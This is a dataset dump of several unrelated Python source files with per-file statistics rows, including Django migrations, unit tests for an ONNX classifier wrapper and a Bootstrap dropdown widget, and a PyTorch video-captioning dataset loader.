                ('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
            ],
            options={
                'db_table': 'courses_wednesday',
            },
        ),
        # Tuesday slots -> table courses_tuesday
        migrations.CreateModel(
            name='CoursesTuesday',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('venue_id', models.IntegerField(blank=True, null=True)),
                ('class_start_time', models.TimeField(blank=True, null=True)),
                ('class_end_time', models.TimeField(blank=True, null=True)),
                ('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
                ('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
                ('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
            ],
            options={
                'db_table': 'courses_tuesday',
            },
        ),
        # Thursday slots -> table courses_thursday
        migrations.CreateModel(
            name='CoursesThursday',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('venue_id', models.IntegerField(blank=True, null=True)),
                ('class_start_time', models.TimeField(blank=True, null=True)),
                ('class_end_time', models.TimeField(blank=True, null=True)),
                ('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
                ('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
                ('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
            ],
            options={
                'db_table': 'courses_thursday',
            },
        ),
        # Monday slots -> table courses_monday
        migrations.CreateModel(
            name='CoursesMonday',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('venue_id', models.IntegerField(blank=True, null=True)),
                ('class_start_time', models.TimeField(blank=True, null=True)),
                ('class_end_time', models.TimeField(blank=True, null=True)),
                ('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
                ('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
                ('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
            ],
            options={
                'db_table': 'courses_monday',
            },
        ),
        # Friday slots -> table courses_friday
        migrations.CreateModel(
            name='CoursesFriday',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('venue_id', models.IntegerField(blank=True, null=True)),
                ('class_start_time', models.TimeField(blank=True, null=True)),
                ('class_end_time', models.TimeField(blank=True, null=True)),
                ('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
                ('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
                ('lecturer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.lecturer')),
            ],
            options={
                'db_table': 'courses_friday',
            },
        ),
    ]
| 57.956522
| 170
| 0.614779
| 581
| 5,332
| 5.473322
| 0.120482
| 0.084906
| 0.102201
| 0.133648
| 0.867925
| 0.867925
| 0.867925
| 0.867925
| 0.867925
| 0.867925
| 0
| 0.004688
| 0.239872
| 5,332
| 91
| 171
| 58.593407
| 0.779916
| 0.00844
| 0
| 0.714286
| 1
| 0
| 0.167644
| 0.003974
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1df6940d7d100c2be68f1806f3ef3e5e1358783a
| 7,938
|
py
|
Python
|
_unittests/ut_sklapi/test_onnx_speedup_classifier.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 32
|
2018-03-04T23:33:30.000Z
|
2022-03-10T19:15:06.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_classifier.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 184
|
2017-11-30T14:10:35.000Z
|
2022-02-21T08:29:31.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_classifier.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 9
|
2019-07-24T13:18:00.000Z
|
2022-03-07T04:08:07.000Z
|
"""
@brief test log(time=5s)
"""
from io import BytesIO
import pickle
import unittest
from logging import getLogger
import numpy
from numba import NumbaWarning
# import pandas
# from sklearn.pipeline import make_pipeline
from sklearn.exceptions import ConvergenceWarning
from sklearn.linear_model import LogisticRegression
from sklearn.datasets import load_iris
from pyquickhelper.pycode import ExtTestCase, ignore_warnings
from mlprodict.sklapi import OnnxSpeedupClassifier
from mlprodict.tools import get_opset_number_from_onnx
from mlprodict.onnx_conv import to_onnx
from mlprodict.onnxrt import OnnxInference
class TestOnnxSpeedupClassifier(ExtTestCase):
    """Exercises OnnxSpeedupClassifier around a LogisticRegression on iris.

    Covers every supported runtime (python, onnxruntime, numpy, numba), both
    float32 and float64 modes, pickle round trips and re-export to ONNX.
    """

    def setUp(self):
        # skl2onnx is noisy during conversion; keep test output quiet.
        getLogger('skl2onnx').disabled = True

    def opset(self):
        """Opset targeted by every conversion in this test case."""
        return get_opset_number_from_onnx()

    def _fitted_speedup(self, X, y, **options):
        """Build an OnnxSpeedupClassifier over LogisticRegression with the
        test opset plus *options*, fit it on (X, y) and return it."""
        model = OnnxSpeedupClassifier(
            LogisticRegression(), target_opset=self.opset(), **options)
        model.fit(X, y)
        return model

    def _check_pickle_roundtrip(self, model, X):
        """Pickle *model*, reload it, and check that both predict and
        raw_predict are unchanged by the round trip."""
        buffer = BytesIO()
        pickle.dump(model, buffer)
        restored = pickle.load(BytesIO(buffer.getvalue()))
        self.assertEqualArray(model.predict(X), restored.predict(X))
        self.assertEqualArray(model.raw_predict(X), restored.raw_predict(X))

    def _check_onnx_export(self, model, X):
        """Convert *model* itself to ONNX and check that OnnxInference
        reproduces the estimator's labels and probabilities."""
        expected_label = model.predict(X)
        expected_proba = model.predict_proba(X)
        sess = OnnxInference(to_onnx(model, X[:1]))
        got = sess.run({'X': X})
        self.assertEqualArray(expected_proba, got['probabilities'])
        self.assertEqualArray(expected_label, got['label'])

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier32(self):
        """float32, default (python) runtime."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target)
        model.assert_almost_equal(data.data, decimal=5)

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier32_onnxruntime(self):
        """float32, onnxruntime backend."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     runtime="onnxruntime1")
        model.assert_almost_equal(data.data, decimal=5)

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier32_numpy(self):
        """float32, generated-numpy runtime."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target, runtime="numpy")
        model.assert_almost_equal(data.data, decimal=5)

    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_classifier32_numba(self):
        """float32, numba-jitted runtime; also checks the jit actually ran."""
        data = load_iris()
        X = data.data.astype(numpy.float32)
        model = self._fitted_speedup(X, data.target,
                                     runtime="numba", nopython=False)
        model.assert_almost_equal(X, decimal=5)
        self.assertIn("CPUDispatch", str(model.onnxrt_.func))

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier64(self):
        """float64, default runtime."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False)
        model.assert_almost_equal(data.data)

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier64_op_version(self):
        """The recorded op_version stays below the requested opset."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False)
        self.assertGreater(self.opset(), model.op_version[''])

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier64_pickle(self):
        """float64 model survives a pickle round trip."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False)
        self._check_pickle_roundtrip(model, data.data)

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier64_numpy_pickle(self):
        """float64 + numpy runtime survives a pickle round trip."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False, runtime="numpy")
        self._check_pickle_roundtrip(model, data.data)

    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_classifier64_numba_pickle(self):
        """float64 + numba runtime survives a pickle round trip."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False, runtime="numba",
                                     nopython=False)
        self._check_pickle_roundtrip(model, data.data)

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier64_onnx(self):
        """float64 model re-exports to ONNX with identical outputs."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False)
        self._check_onnx_export(model, data.data)

    @ignore_warnings(ConvergenceWarning)
    def test_speedup_classifier64_onnx_numpy(self):
        """float64 + numpy runtime re-exports to ONNX."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False, runtime='numpy')
        self._check_onnx_export(model, data.data)

    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_classifier64_onnx_numba(self):
        """float64 + numba runtime re-exports to ONNX."""
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False, runtime='numba',
                                     nopython=False)
        self._check_onnx_export(model, data.data)

    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_classifier64_onnx_numba_python(self):
        """Same scenario as test_speedup_classifier64_onnx_numba.

        NOTE(review): despite the `_python` suffix this also passes
        nopython=False, making it a duplicate of the previous test — confirm
        whether nopython=True was intended.
        """
        data = load_iris()
        model = self._fitted_speedup(data.data, data.target,
                                     enforce_float32=False, runtime='numba',
                                     nopython=False)
        self._check_onnx_export(model, data.data)
if __name__ == "__main__":
    unittest.main()
| 35.123894
| 74
| 0.645251
| 880
| 7,938
| 5.634091
| 0.121591
| 0.010488
| 0.079064
| 0.041952
| 0.835418
| 0.818677
| 0.817668
| 0.765631
| 0.73457
| 0.73457
| 0
| 0.012408
| 0.248677
| 7,938
| 225
| 75
| 35.28
| 0.818913
| 0.025447
| 0
| 0.755208
| 0
| 0
| 0.01942
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.078125
| false
| 0
| 0.072917
| 0.005208
| 0.161458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e12b6ca775cc034ecc5de090637ff9de365d577
| 2,092
|
py
|
Python
|
test/dropdown_test.py
|
screamingskulls/sofi
|
1d75bc97683151864f8a4cafb59ef8e50de63ee4
|
[
"MIT"
] | 402
|
2016-04-05T23:11:07.000Z
|
2022-02-22T21:10:49.000Z
|
test/dropdown_test.py
|
screamingskulls/sofi
|
1d75bc97683151864f8a4cafb59ef8e50de63ee4
|
[
"MIT"
] | 87
|
2016-03-31T00:09:39.000Z
|
2021-02-22T04:49:25.000Z
|
test/dropdown_test.py
|
screamingskulls/sofi
|
1d75bc97683151864f8a4cafb59ef8e50de63ee4
|
[
"MIT"
] | 54
|
2016-03-31T00:10:33.000Z
|
2021-06-23T21:38:36.000Z
|
from sofi.ui import Dropdown
def test_basic():
    """A bare Dropdown renders a div-wrapped toggle button and an empty menu."""
    expected = "<div class=\"dropdown\"><button class=\"btn btn-default dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">text <span class=\"caret\"></span></button><ul class=\"dropdown-menu\"></ul></div>"
    assert str(Dropdown("text")) == expected
def test_dropup():
    """dropup=True swaps the wrapper class from 'dropdown' to 'dropup'."""
    expected = "<div class=\"dropup\"><button class=\"btn btn-default dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">text <span class=\"caret\"></span></button><ul class=\"dropdown-menu\"></ul></div>"
    assert str(Dropdown("text", dropup=True)) == expected
def test_navbaritem():
    """navbaritem=True renders an <li>/<a> pair instead of <div>/<button>."""
    expected = "<li class=\"dropup\"><a class=\"dropdown-toggle\" href=\"#\" role=\"button\" data-toggle=\"dropdown\" aria-haspopup=\"true\" aria-expanded=\"false\">text <span class=\"caret\"></span></a><ul class=\"dropdown-menu\"></ul></li>"
    assert str(Dropdown("text", dropup=True, navbaritem=True)) == expected
def test_align_right():
    """align='right' adds the dropdown-menu-right class to the menu list."""
    expected = "<li class=\"dropdown\"><a class=\"dropdown-toggle\" href=\"#\" role=\"button\" data-toggle=\"dropdown\" aria-haspopup=\"true\" aria-expanded=\"false\">text <span class=\"caret\"></span></a><ul class=\"dropdown-menu dropdown-menu-right\"></ul></li>"
    assert str(Dropdown("text", align='right', navbaritem=True)) == expected
def test_custom_class_ident_and_style():
    """cl/ident/style propagate to the wrapper id, class list and style attr."""
    expected = "<div id=\"123-dropdown\" class=\"dropdown abclass\" style=\"font-size:0.9em;\"><button id=\"123\" class=\"btn btn-default dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">text <span class=\"caret\"></span></button><ul class=\"dropdown-menu\"></ul></div>"
    rendered = str(Dropdown("text", cl='abclass', ident='123', style="font-size:0.9em;"))
    assert rendered == expected
def test_navbaritem_custom_class_ident_and_style():
    """cl/ident/style work the same way in the navbar (<li>/<a>) variant."""
    expected = "<li id=\"123-dropdown\" class=\"dropdown abclass\" style=\"font-size:0.9em;\"><a id=\"123\" class=\"dropdown-toggle\" href=\"#\" role=\"button\" data-toggle=\"dropdown\" aria-haspopup=\"true\" aria-expanded=\"false\">text <span class=\"caret\"></span></a><ul class=\"dropdown-menu\"></ul></li>"
    rendered = str(Dropdown("text", navbaritem=True, cl='abclass', ident='123', style="font-size:0.9em;"))
    assert rendered == expected
| 95.090909
| 318
| 0.656788
| 286
| 2,092
| 4.748252
| 0.167832
| 0.124448
| 0.07511
| 0.092784
| 0.807806
| 0.807806
| 0.76215
| 0.76215
| 0.76215
| 0.645803
| 0
| 0.013485
| 0.078394
| 2,092
| 21
| 319
| 99.619048
| 0.690871
| 0
| 0
| 0
| 0
| 0
| 0.404398
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.066667
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
385466d0b2fcca93f4d063c912058a4826d800e5
| 337
|
py
|
Python
|
src/openbiolink/graph_creation/file_processor/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 97
|
2019-11-26T09:53:18.000Z
|
2022-03-19T10:33:10.000Z
|
src/openbiolink/graph_creation/file_processor/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 67
|
2019-12-09T21:01:52.000Z
|
2021-12-21T15:19:41.000Z
|
src/openbiolink/graph_creation/file_processor/__init__.py
|
jerryhluo/OpenBioLink
|
6fc073af978daec0b0db5938b73beed37f57f495
|
[
"MIT"
] | 20
|
2020-01-13T23:02:25.000Z
|
2022-03-16T21:43:31.000Z
|
from openbiolink.graph_creation.file_processor.edge import *
from openbiolink.graph_creation.file_processor.fileProcessor import FileProcessor
from openbiolink.graph_creation.file_processor.mapping import *
from openbiolink.graph_creation.file_processor.onto import *
from openbiolink.graph_creation.file_processor.onto_mapping import *
| 56.166667
| 81
| 0.884273
| 42
| 337
| 6.833333
| 0.261905
| 0.261324
| 0.348432
| 0.487805
| 0.804878
| 0.804878
| 0.519164
| 0.355401
| 0
| 0
| 0
| 0
| 0.059347
| 337
| 5
| 82
| 67.4
| 0.905363
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
38b34cea4d5e93b4c41a18a53f150488ced74138
| 9,113
|
py
|
Python
|
dataloader.py
|
stillarrow/S2VT_ACT
|
1a0fbf93f36492696e8c044ad1816d276747e26a
|
[
"MIT"
] | 3
|
2020-12-14T18:24:45.000Z
|
2021-11-12T23:02:15.000Z
|
dataloader.py
|
stillarrow/S2VT_ACT
|
1a0fbf93f36492696e8c044ad1816d276747e26a
|
[
"MIT"
] | null | null | null |
dataloader.py
|
stillarrow/S2VT_ACT
|
1a0fbf93f36492696e8c044ad1816d276747e26a
|
[
"MIT"
] | 1
|
2020-12-17T23:10:57.000Z
|
2020-12-17T23:10:57.000Z
|
import json
import random
import os
import numpy as np
import torch
from torch.utils.data import Dataset
class VideoDataset(Dataset):
    """Dataset of pre-extracted video features paired with tokenized captions.

    Each item bundles 2D appearance features (optionally concatenated with
    mean-pooled C3D motion features), one randomly chosen caption as the
    training label, a mask over its valid tokens, and all ground-truth
    captions for evaluation.
    """

    def get_vocab_size(self):
        """Return the number of entries in the index-to-word vocabulary."""
        return len(self.get_vocab())

    def get_vocab(self):
        """Return the index-to-word mapping loaded from the info json."""
        return self.ix_to_word

    def get_seq_length(self):
        # NOTE(review): self.seq_length is never assigned in __init__; this
        # raises AttributeError unless a caller sets it first — confirm usage.
        return self.seq_length

    def __init__(self, opt, mode):
        """Load caption/info json files and remember feature directories.

        opt  -- dict-like config with keys "caption_json", "info_json",
                "feats_dir", "c3d_feats_dir", "with_c3d" and "max_len".
        mode -- which split to serve: 'train', 'validate' or 'test'.
        """
        super(VideoDataset, self).__init__()
        self.mode = mode  # split served by __getitem__/__len__
        # load the json files describing captions and the dataset splits;
        # use context managers so the handles are closed deterministically
        with open(opt["caption_json"]) as fin:
            self.captions = json.load(fin)
        with open(opt["info_json"]) as fin:
            info = json.load(fin)
        self.ix_to_word = info['ix_to_word']
        self.word_to_ix = info['word_to_ix']
        print('vocab size is ', len(self.ix_to_word))
        self.splits = info['videos']
        print('number of train videos: ', len(self.splits['train']))
        print('number of validate videos: ', len(self.splits['validate']))
        print('number of test videos: ', len(self.splits['test']))
        self.feats_dir = opt["feats_dir"]
        self.c3d_feats_dir = opt['c3d_feats_dir']
        self.with_c3d = opt['with_c3d']
        print('load feats from %s' % (self.feats_dir))
        # maximum caption length (in tokens) used for padding/truncation
        self.max_len = opt["max_len"]
        print('max sequence length in data is', self.max_len)

    def __getitem__(self, ix):
        """Return a dict sample for split-local index *ix* (passed to collate_fn)."""
        # global indices are laid out as [train | validate | test]
        if self.mode == 'validate':
            ix += len(self.splits['train'])
        elif self.mode == 'test':
            ix = ix + len(self.splits['train']) + len(self.splits['validate'])
        fc_feat = []
        for feat_dir in self.feats_dir:  # renamed: 'dir' shadowed the builtin
            fc_feat.append(np.load(os.path.join(feat_dir, 'video%i.npy' % (ix))))
        fc_feat = np.concatenate(fc_feat, axis=1)
        if self.with_c3d == 1:
            # mean-pool C3D over time and tile it onto every frame's features
            c3d_feat = np.load(os.path.join(self.c3d_feats_dir, 'video%i.npy' % (ix)))
            c3d_feat = np.mean(c3d_feat, axis=0, keepdims=True)
            fc_feat = np.concatenate((fc_feat, np.tile(c3d_feat, (fc_feat.shape[0], 1))), axis=1)
        label = np.zeros(self.max_len)
        mask = np.zeros(self.max_len)
        captions = self.captions['video%i' % (ix)]['final_captions']
        # encode every caption into a (num_captions, max_len) id matrix,
        # truncating over-long captions and forcing a trailing <EOS>
        gts = np.zeros((len(captions), self.max_len))
        for i, cap in enumerate(captions):
            if len(cap) > self.max_len:
                cap = cap[:self.max_len]
                cap[-1] = '<EOS>'
            for j, w in enumerate(cap):
                gts[i, j] = self.word_to_ix[w]
        # randomly select one caption as the training target
        cap_ix = random.randint(0, len(captions) - 1)
        label = gts[cap_ix]
        # mask is 1 up to and including the first token id <= 1
        # (<EOS>=1 and <PAD>=0 by convention in this file)
        non_zero = (label <= 1).nonzero()
        try:
            mask[:int(non_zero[0][0]) + 1] = 1
        except IndexError as exc:
            # no terminator found at all: dump the offending sample, then fail
            # (was a bare `except:`, which also swallowed KeyboardInterrupt)
            print('non_zero:{}'.format(non_zero))
            print('captions:{}'.format(captions))
            print('gts:{}'.format(gts))
            print('label:{}'.format(label))
            raise ValueError from exc
        data = {}
        data['fc_feats'] = torch.from_numpy(fc_feat).type(torch.FloatTensor)
        data['labels'] = torch.from_numpy(label).type(torch.LongTensor)
        data['masks'] = torch.from_numpy(mask).type(torch.FloatTensor)
        data['gts'] = torch.from_numpy(gts).long()
        data['video_ids'] = 'video%i' % (ix)
        return data

    def __len__(self):
        """Return the number of videos in the currently selected split."""
        return len(self.splits[self.mode])
class VideoActDataset(Dataset):
    """Caption dataset that additionally returns a weakly-supervised action token.

    Same feature/caption handling as VideoDataset; each sample also carries
    the vocabulary id of one action phrase mined from the captions (falling
    back to <PAD> when no known action occurs).
    """

    def get_vocab_size(self):
        # Number of words in the vocabulary.
        return len(self.get_vocab())

    def get_vocab(self):
        # Index-to-word mapping loaded from the info json.
        return self.ix_to_word

    def get_seq_length(self):
        # NOTE(review): self.seq_length is never assigned in __init__; this
        # raises AttributeError unless a caller sets it first — confirm usage.
        return self.seq_length

    def __init__(self, opt, mode):
        # mode selects which split ('train'/'validate'/'test') is served.
        super(VideoActDataset, self).__init__()
        self.mode = mode  # to load train/validate/test data
        # load the action set; expects lines of the form "<id>: <phrase>",
        # skipping lines of length <= 2 (blank/near-blank lines)
        self.action_set = {}
        with open('./data/actions_short.txt', 'rt') as f:
            for line in f:
                if len(line) > 2:
                    line_data = line.strip().split(': ')
                    self.action_set[line_data[0]] = line_data[1]
        self.action_numbers = len(self.action_set)
        # load the json file which contains information about the dataset
        self.captions = json.load(open(opt["caption_json"]))
        info = json.load(open(opt["info_json"]))
        self.ix_to_word = info['ix_to_word']
        self.word_to_ix = info['word_to_ix']
        print('vocab size is ', len(self.ix_to_word))
        self.splits = info['videos']
        print('number of train videos: ', len(self.splits['train']))
        print('number of validate videos: ', len(self.splits['validate']))
        print('number of test videos: ', len(self.splits['test']))
        self.feats_dir = opt["feats_dir"]
        self.c3d_feats_dir = opt['c3d_feats_dir']
        self.with_c3d = opt['with_c3d']
        print('load feats from %s' % (self.feats_dir))
        # load in the sequence data
        self.max_len = opt["max_len"]
        print('max sequence length in data is', self.max_len)

    def __getitem__(self, ix):
        """This function returns a tuple that is further passed to collate_fn
        # Update 1 #
        instead of only return the max_len's text one-hot data, also return a action text (if there isn't, return <PAD>).
        """
        # which part of data to load; global indices are [train|validate|test]
        if self.mode == 'validate':
            ix += len(self.splits['train'])
        elif self.mode == 'test':
            ix = ix + len(self.splits['train']) + len(self.splits['validate'])
        fc_feat = []
        for dir in self.feats_dir:
            fc_feat.append(np.load(os.path.join(dir, 'video%i.npy' % (ix))))
        fc_feat = np.concatenate(fc_feat, axis=1)
        if self.with_c3d == 1:
            # mean-pool C3D over time and tile onto every frame's features
            c3d_feat = np.load(os.path.join(self.c3d_feats_dir, 'video%i.npy' % (ix)))
            c3d_feat = np.mean(c3d_feat, axis=0, keepdims=True)
            fc_feat = np.concatenate((fc_feat, np.tile(c3d_feat, (fc_feat.shape[0], 1))), axis=1)
        label = np.zeros(self.max_len)
        mask = np.zeros(self.max_len)
        captions = self.captions['video%i' % (ix)]['final_captions']
        raw_captions = self.captions['video%i' % (ix)]['captions']
        # Add <PAD>
        gts = np.zeros((len(captions), self.max_len))
        for i, cap in enumerate(captions):
            if len(cap) > self.max_len:
                cap = cap[:self.max_len]
                cap[-1] = '<EOS>'
            for j, w in enumerate(cap):
                gts[i, j] = self.word_to_ix[w]
        # random select a caption for this video
        cap_ix = random.randint(0, len(captions) - 1)
        label = gts[cap_ix]
        # Select Actions
        cnt_actions_in_select_cap = {}  # This count the frequency of actions for the cap_ix caption
        cnt_actions_in_all_cap = {}
        select_act = '<PAD>'  # Default set to be <PAD>
        for key in self.action_set.keys():
            cnt_actions_in_select_cap[key] = 0
            cnt_actions_in_all_cap[key] = 0
        # NOTE(review): `cap` below is the leftover loop variable from the
        # enumerate loop above, i.e. the LAST caption — not captions[cap_ix]
        # as the comment on cnt_actions_in_select_cap suggests. Likely a bug;
        # confirm intended behavior before changing.
        for key in self.action_set.keys():
            if self.action_set[key] in cap:
                cnt_actions_in_select_cap[key] += 1
        action_freq_select = list(cnt_actions_in_select_cap.values())
        if sum(action_freq_select) > 0:
            # randomly return an action appears in this selected caption
            act_select_idx = np.random.choice(
                self.action_numbers, 1, p=np.array(action_freq_select)/sum(action_freq_select))
            select_act = list(self.action_set.values())[act_select_idx[0]]
        else:
            # fall back to action frequencies counted over all raw captions
            for cap in raw_captions:
                for key in self.action_set.keys():
                    if self.action_set[key] in cap:
                        cnt_actions_in_all_cap[key] += 1
            action_freq_all = list(cnt_actions_in_all_cap.values())
            if sum(action_freq_all) > 0:
                act_select_idx = np.random.choice(self.action_numbers, 1, p=np.array(action_freq_all)/sum(action_freq_all))
                select_act = list(self.action_set.values())[act_select_idx[0]]
        # map the chosen action phrase to a vocabulary id, <PAD> if unknown
        if select_act in self.word_to_ix.keys():
            select_act_token = self.word_to_ix[select_act]
        else:
            select_act_token = self.word_to_ix['<PAD>']
        # Mask is used to mask <EOS> and <PAD>. <EOS>=1 and <PAD>=0
        # NOTE(review): unlike VideoDataset.__getitem__ there is no try/except
        # guard here; raises IndexError when label has no token id <= 1.
        non_zero = (label <= 1).nonzero()
        mask[:int(non_zero[0][0]) + 1] = 1
        data = {}
        data['fc_feats'] = torch.from_numpy(fc_feat).type(torch.FloatTensor)
        data['labels'] = torch.from_numpy(label).type(torch.LongTensor)
        data['masks'] = torch.from_numpy(mask).type(torch.FloatTensor)
        data['gts'] = torch.from_numpy(gts).long()
        data['video_ids'] = 'video%i' % (ix)
        data['action'] = torch.tensor(select_act_token).type(torch.LongTensor)
        return data

    def __len__(self):
        # Size of the currently selected split.
        return len(self.splits[self.mode])
| 39.969298
| 125
| 0.586415
| 1,283
| 9,113
| 3.95947
| 0.132502
| 0.028937
| 0.035827
| 0.016535
| 0.832283
| 0.81378
| 0.785827
| 0.770669
| 0.763583
| 0.763583
| 0
| 0.010063
| 0.280259
| 9,113
| 227
| 126
| 40.145374
| 0.764446
| 0.105015
| 0
| 0.74269
| 0
| 0
| 0.098962
| 0.002965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.035088
| 0.046784
| 0.175439
| 0.093567
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38d4e091dfb8c220d9bb89331ed51e2a087606a2
| 13,974
|
py
|
Python
|
frequencies/migrations/0001_initial.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 14
|
2019-09-30T12:44:17.000Z
|
2022-02-04T14:45:16.000Z
|
frequencies/migrations/0001_initial.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 244
|
2021-03-26T15:13:15.000Z
|
2022-03-31T15:48:04.000Z
|
frequencies/migrations/0001_initial.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 8
|
2020-05-19T21:55:13.000Z
|
2022-03-31T07:02:58.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-19 10:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Exac",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("ac_afr", models.IntegerField(null=True)),
("ac_amr", models.IntegerField(null=True)),
("ac_eas", models.IntegerField(null=True)),
("ac_fin", models.IntegerField(null=True)),
("ac_nfe", models.IntegerField(null=True)),
("ac_oth", models.IntegerField(null=True)),
("ac_sas", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("an_afr", models.IntegerField(null=True)),
